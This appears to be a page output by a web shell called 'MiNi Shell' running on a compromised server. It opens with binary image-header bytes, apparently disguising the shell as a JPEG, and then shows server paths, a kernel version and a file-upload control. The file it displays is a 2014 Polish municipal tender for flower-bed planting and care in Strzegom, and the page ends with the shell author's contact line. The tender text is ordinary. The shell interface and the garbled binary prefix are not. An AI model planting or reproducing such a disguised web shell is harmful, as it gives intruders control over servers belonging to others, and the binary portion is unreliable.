JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140114/8185-N-2014.html

<p class="kh_header"><b>Strzegom: OBSADZENIE KLOMBÓW, GAZONÓW, SKRZYNEK I AMPLI MATERIAŁEM WŁASNYM WYKONAWCY ORAZ CAŁOSEZONOWA PIELĘGNACJA KLOMBÓW, GAZONÓW I AMPLI  WRAZ Z LIKWIDACJĄ NASADZEŃ 
I PRZEKOPANIEM KLOMBÓW W ROKU 2014</b><br>
<b>Numer ogłoszenia: 8185 - 2014; data zamieszczenia: 14.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzegom , ul. Rynek 38, 58-150 Strzegom, woj. dolnośląskie, tel. (074)  856-05-99, faks (074 ) 856-05-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzegom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OBSADZENIE KLOMBÓW, GAZONÓW, SKRZYNEK I AMPLI MATERIAŁEM WŁASNYM WYKONAWCY ORAZ CAŁOSEZONOWA PIELĘGNACJA KLOMBÓW, GAZONÓW I AMPLI  WRAZ Z LIKWIDACJĄ NASADZEŃ 
I PRZEKOPANIEM KLOMBÓW W ROKU 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest obsadzenie  klombów, gazonów, skrzynek i ampli  materiałem własnym Wykonawcy oraz całosezonową pielęgnację klombów, gazonów i ampli  wraz z likwidacją nasadzeń i przekopaniem klombów w roku 2014.

2. Obowiązkiem Wykonawcy będzie dostarczenie sadzonek będących własnością Wykonawcy, obsadzenie kwiatami klombów kwiatowych oraz donic i skrzynek w miejscach wskazanych przez Zamawiającego, wraz z całosezonową pielęgnacją, podlewaniem i uzupełnianiem sadzonek. Na koniec okresu wegetacyjnego likwidacja nasadzeń i przekopanie rabat. 

3. Całość zamówienia obejmuje: 
I.	Letnie obsadzenie klombów oraz donic i skrzynek na terenie Miasta Strzegom kwiatami:

A. Obsadzenie kwiatami klombów od 15 maja 2014r. do 31 maja 2014r. wg zestawionych powierzchni, w sposób i terminach podanych poniżej: 
1. Klomb przed budynkiem Urzędu Miejskiego - 109 m2
2. Klomb przed budynkiem Urzędu Miejskiego - 8,50 m2
3. Klomb przed budynkiem Urzędu Miejskiego - 7,90 m2
4. Klomb przy ul. Rynek - 3,10 m2
5. Klomb przy ul. Rynek - 33,40 m2
6. Klomb przy ul. Rynek - 32,20 m2
7. Klomb przy ul. Rynek - 37,40 m2
8. Klomb przy ul. Rynek - 21,80 m2
9. Klomb przy ul. Rynek - 23,50 m2
10. Klomb przy ul. Rynek - 17,10 m2
11. Klomb przy ul. Rynek - 45,88 m2
12. Klomb przy ul. Rynek - 29,20 m2
13. Klomb przy ul. Rynek - 18,60 m2
14. Klomb przy ul. Rynek - 26,50 m2
15. Klomb przy ul. Rynek - 19,80 m2
16. Klomb przy ul. Dąbrowskiego - 12,40 m2
17. Klomb przy ul. Dąbrowskiego - 21,60 m2
18. Klomb przy ul. Dąbrowskiego - 26,20 m2
19. Klomb przy ul. Dąbrowskiego - 12,40 m2
20. Klomb przy fontannie -7,90 m2	

21. Klomb przy fontannie -  22,30 m2
22. Klomb przy fontannie -  28,60 m2
23. Klomb przy fontannie -  5,20 m2
24. Klomb przy fontannie -  7,40 m2
25. Klomb przy fontannie -  28,30 m2
26. Klomb przy fontannie -  23,50 m2
27. Klomb przy fontannie -  10,20 m2

Ogólna powierzchnia klombów wynosi 639,80 m2. 
O obsadzeniu klombów Wykonawca powinien powiadomić Zamawiającego. 
Aranżację klombów Wykonawca powinien uzgodnić z Zamawiającym.

B - Obsadzenie kwiatami gazonów w terminie od 15 maja 2014 r. do 31 maja 2014 r. w miejscach: 
- w obrębie Strzegomskiego Rynku  - 17 szt. 
- w obrębie ul. Dąbrowskiego  - 13szt. 
- w obrębie ul. Św. Anny - 2 szt.
O obsadzeniu gazonów Wykonawca powinien powiadomić Zamawiającego. 
Aranżację gazonów Wykonawca powinien uzgodnić z Zamawiającym.

C - Obsadzenie pelargoniami bluszczolistnymi pojedynczymi  koloru czerwonego w aranżacji 
z uczepem złocistym  ampli w ilości 26szt.  po 2 naczynia każdy, razem 52 naczynia , po 9 szt. pelargonii  i 1 szt. uczepu złocistego w każdym naczyniu ampli w terminie do dnia 15 lutego 2014 r. 
i zawieszenie ampli na latarniach ulicznych w miejscach wskazanych przez zamawiającego do dnia 15 maja 2014r.

Ample Wykonawca odbierze z Zakładu Usług Komunalnych w Strzegomiu, Aleja Wojska Polskiego 75 na swój koszt.                         
O obsadzeniu ampli Wykonawca powinien powiadomić Zamawiającego. Razem 520 szt. roślin.

D  - Obsadzenie pelargoniami bluszczolistnymi pojedynczymi  koloru czerwonego, białego, różowego w aranżacji z uczepem złocistym ampli w ilości 10 szt.  po 2 naczynia każdy, razem 20 naczyń , po 10 roślin różnego koloru w każdym naczyniu ampli w terminie do dnia 15 lutego 2014 r. i zawieszenie ampli na latarniach ulicznych w miejscach wskazanych przez zamawiającego do dnia 15 maja 2014r.


Ample Wykonawca odbierze z Zakładu Usług Komunalnych w Strzegomiu, Aleja Wojska Polskiego 75 na swój koszt.      
O obsadzeniu ampli Wykonawca powinien powiadomić Zamawiającego. Razem 200 szt. roślin.

E. - Obsadzenie pelargoniami bluszczolistnymi pojedynczymi  koloru czerwonego, białego, różowego w aranżacji z uczepem złocistym skrzynek balkonowych na budynek Urzędu Miejskiego w ilości 70 sztuk po 3 rośliny różnego koloru w skrzynce w terminie do dnia 15 lutego 2014 r. i umieszczenie doniczek w miejscach wskazanych przez zamawiającego do dnia 15 maja 2014r.

Skrzynki Wykonawca odbierze z Urzędu Miejskiego w Strzegomiu, Rynek 38 na swój koszt.  
O obsadzeniu skrzynek Wykonawca powinien powiadomić Zamawiającego. Razem 210 szt. roślin.

II. Całosezonowa pielęgnacja dotyczy klombów, ampli i gazonów od momentu rozpoczęcia nasadzeń do 15 października 2014 r. oraz likwidacja nasadzeń i przekopanie klombów od 16 października 2014 r. (lub wcześniej po uszkodzeniu roślin przez mróz) do 30 października 2014 r. w tym: 


A. Pielęgnacja nasadzeń od momentu rozpoczęcia nasadzeń do dnia 15 października 2014 r tj:     
 - podlewanie jeden raz w tygodniu a w przypadku wystąpienia wysokich  temperatur (powyżej 28oC) przez trzy dni następujące po sobie  2 razy w tygodniu (każdorazowe podlewanie należy potwierdzić na liście obecności dostępnej w Wydziale Gospodarki Komunalnej, Ochrony Środowiska i Wsi, I piętro, pokój 26),
-  plewienie (należy nie dopuścić do zachwaszczenia gleby w klombach oraz gazonach), 
-nawożenie nawozami mineralnymi ( w zależności od kondycji rośliny należy używać nawozów wpływających na wzrost roślin, kwitnienie, wybarwianie), 
-czyszczenie przekwitów jeden raz w miesiącu, 
-uzupełnianie sadzonek zmrożonych, uszkodzonych przez zwierzęta i osoby trzecie,
- wywóz powstałej przy pielęgnacji rabat biomasy. 
 

B - Likwidacja nasadzeń i przekopanie gleby na łącznej powierzchni  639,80 m2 od 16 października 2014 r. (lub wcześniej po uszkodzeniu roślin przez mróz) do 30 października 2014 r.

Ample oraz skrzynki przed posadzeniem kwiatów należy zdezynfekować w celu zabezpieczenia roślin przed zarażeniem chorobami posezonowymi. Do posadzenia roślin należy zastosować podłoże typowe dla pelargonii z  zastosowaniem odpowiedniego nawozu wolnouwalniającego. 
W maju w momencie umieszczania ampli na latarniach ulicznych oraz skrzynek na budynku Urzędu Miejskiego  rośliny muszą być krępe, zwarte o krótkich międzywęźlach bez znamion chorobowych. Rośliny muszą być w początkowej fazie kwitnienia z dużą ilością mocno zainicjonowanych pąków kwiatowych. Rośliny mają tworzyć koronę wokół naczynia. Zwis roślin 40-50 cm.  
Rośliny do nasadzeń klombów i gazonów muszą być krępe, zwarte o krótkich międzywęźlach bez znamion chorobowych, dobrze wybarwione. Zwis roślin minimum 20cm.
Canna  w momencie wysadzania do gruntu musi mieć wysokość części zielonej 55-60cm ponad donicę, z pąkiem kwiatowym, bez znamion chorobowych.
Zamawiający zastrzega, że sadzonki, które uległy zmrożeniu, uszkodzeniu przez zwierzęta i osoby trzecie, wykonawca będzie musiał uzupełnić niezwłocznie na własny koszt bez dodatkowej zapłaty. Rozpoczęcie prac uzupełniających nastąpi w pierwszej dobie po powstaniu i stwierdzeniu zaistniałej szkody, o której Wykonawca zostanie poinformowany przez Zamawiającego telefonicznie. Zakończenie prac uzupełniających ma nastąpić najpóźniej do trzech dni od daty poinformowania Wykonawcy przez Zamawiającego. W razie nieterminowego dokonania uzupełnień Zamawiający będzie domagał się kar umownych. 
Kwiaty powinny zostać wysadzone do gruntu według aranżacji uzgodnionej z Zamawiającym.
WYKAZ SADZONEK DO NASADZEŃ W SEZONIE WEGETACJNYM 2014r. 

1.Pelargonia bluszczolistna pojedyńcza czerwona	szt.	600,

2.Pelargonia bluszczolistna pojedyńcza biała	szt.	137,
3. Pelargonia bluszczolistna pojedyńcza różowa	szt.	137,
4. Uczep złocisty	szt.	56,
5. Canna w kolorach żółtym, białym, różowym - posiadające zalążki kwiatów.
	szt. 	659 po 233szt z każdego koloru,
 

6. Miskant chiński (dronning ingrid)	szt.	40,
7. Niecierpek
w kolorach:
różowy 1 504 szt.,
biały      1 700 szt.,
czerwony 948 szt.,
oranż     1780 szt.	szt.	5 932,


8. Sufrinia w 4 kolorach	szt.	400 po100szt każdego koloru,
9. Begonia bulwiasta stojąca w kolorach żółta, czerwona, pomarańczowa	szt.	381 po 127 szt. każdego koloru,
9. Ipomea black, lime	szt	200 po 100szt każdego koloru, Łącznie:
	szt. 	8 542,00.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że  w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, wykonał co najmniej jedno obsadzenie klombów wraz 
z ich pielęgnacją o wartości minimum 90.000 zł. brutto.
Wykonawca musi wykazać, że  usługa ta została lub jest wykonywana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

1.  Potwierdzeniem spełnienia warunków będzie złożenie dokumentów i oświadczeń. Z treści złożonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać spełnienie przez Wykonawcę wymaganych warunków udziału w postępowaniu. Zamawiający dokona oceny spełniania powyższych warunków na podstawie złożonych przez Wykonawcę dokumentów 
i oświadczeń na zasadzie spełnia warunek/nie spełnia warunku. 


2.  Dla potrzeb oceny spełnienia warunku dot. wiedzy i doświadczenia, w przypadku gdy wartości zostaną podane w walutach innych niż PLN,  Zamawiający przyjmie średni kurs PLN do tej waluty podawany przez NBP na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.            

3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami      niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zobowiązanie musi wskazywać przekazane zasoby (rodzaj i ilość, wskazywać okres na jaki zostają przekazane oraz formę stosunków prawnych łączących Wykonawcę z tymi podmiotami wraz z załączeniem stosownej umowy/porozumienia).
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego warunki spełniają łącznie, natomiast każdy z wykonawców wspólnie ubiegających się o zamówienie zobowiązany jest wykazać brak podstaw do wykluczenia go z postępowania na podstawie 
art. 24 ust. 1 ustawy Pzp.

5. Wykonawcy wspólnie ubiegający się o zamówienie:
1)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,
2)	zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do
 podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność 
z  oryginałem wszystkich dokumentów,
3)	pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem,
4)	jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców, 
5)	Wszelka korespondencja dokonywana będzie z Wykonawcą występującym jako reprezentant pozostałych (liderem),
6)	Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>co najmniej jedno obsadzenie klombów wraz z ich pielęgnacją o wartości minimum 90.000 zł. brutto.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy, która zawarta będzie z Wykonawcą stanowi załącznik nr 5 do SIWZ. Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach, jak w projekcie umowy.
2.  Wszystkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności. Zamawiający przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie strony. W szczególności Zamawiający dopuszcza:
1) Aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp.;
2) Zmiany terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze Stron musi udokumentować;
3) Zmianę umowy w przypadku zmiany przepisów prawa obowiązujących na dzień zawarcia umowy w zakresie mającym wpływ na realizację umowy, w tym zmiany ustawowej stawki podatku od towarów i usług VAT, prowadzącej do zmiany kwoty.

3. Warunki dokonywania zmian: 
     3.1  inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego, 
     3.2  uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
     3.3  zmiany umowy, o których mowa powyżej  muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze zm.) stanowiącego, że umowa podlega unieważnieniu 
w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ. 
     3.4  forma pisemna pod rygorem nieważności w formie aneksu do umowy.

4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.strzegom.pl (pod ogłoszeniem)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Rynek 38, 58-150 Strzegom, pok. 15 lub za zaliczeniem pocztowym. Cena specyfikacji 15,70 zł (plus koszty przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2014 godzina 11:30, miejsce: Urząd Miejski, Rynek 38, 58-150 Strzegom - Wydział Obsługi Interesanta, parter - pok. 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy. IV.4.7) Uprawnionymi do kontaktowania się z Wykonawcami jest pani Monika Pawlik - tel. 74/ 8 560 533, pani Wioleta Wnęk Soczyńska - tel. 47/ 8560 531. 
IV.4.8) Zamawiający nie zamierza zawierać umowy ramowej. 
IV.4.9) Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com